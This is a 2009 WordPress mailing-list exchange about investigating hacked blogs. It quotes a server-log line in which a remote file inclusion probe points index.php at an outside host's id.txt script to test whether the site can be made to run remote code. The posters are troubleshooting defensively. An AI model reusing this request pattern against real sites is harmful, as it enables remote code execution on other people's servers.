[wp-hackers] Hacked blogs

Chris Jean gaarai at gaarai.com
Thu Mar 26 15:55:58 GMT 2009


Just to throw the idea out there. Is it possible that such requests are 
merely red herrings? In other words, could those requests be distracting 
away from the actual problem?

Looking at the code at the id.txt file, all that does is provide output 
to the calling script that verifies certain characteristics of the 
server. So, there probably is something else going on. Of course, it 
also confirms that the target is vulnerable to that vector of attack.

Chris Jean
http://gaarai.com/
http://wp-roadmap.com/
http://dnsyogi.com/



Joost de Valk wrote:
> Nope, can't find a bloody thing yet. These kind of requests:
>
> GET /index.php?op=http://oursoultvxq.com/bbs/data/vip/id.txt???? HTTP/1.1
>
> in all the logs, but grepping through the entire htdocs dir, nothing 
> that responds to them.
>
> _______________________________________________
> wp-hackers mailing list
> wp-hackers at lists.automattic.com
> http://lists.automattic.com/mailman/listinfo/wp-hackers
>


More information about the wp-hackers mailing list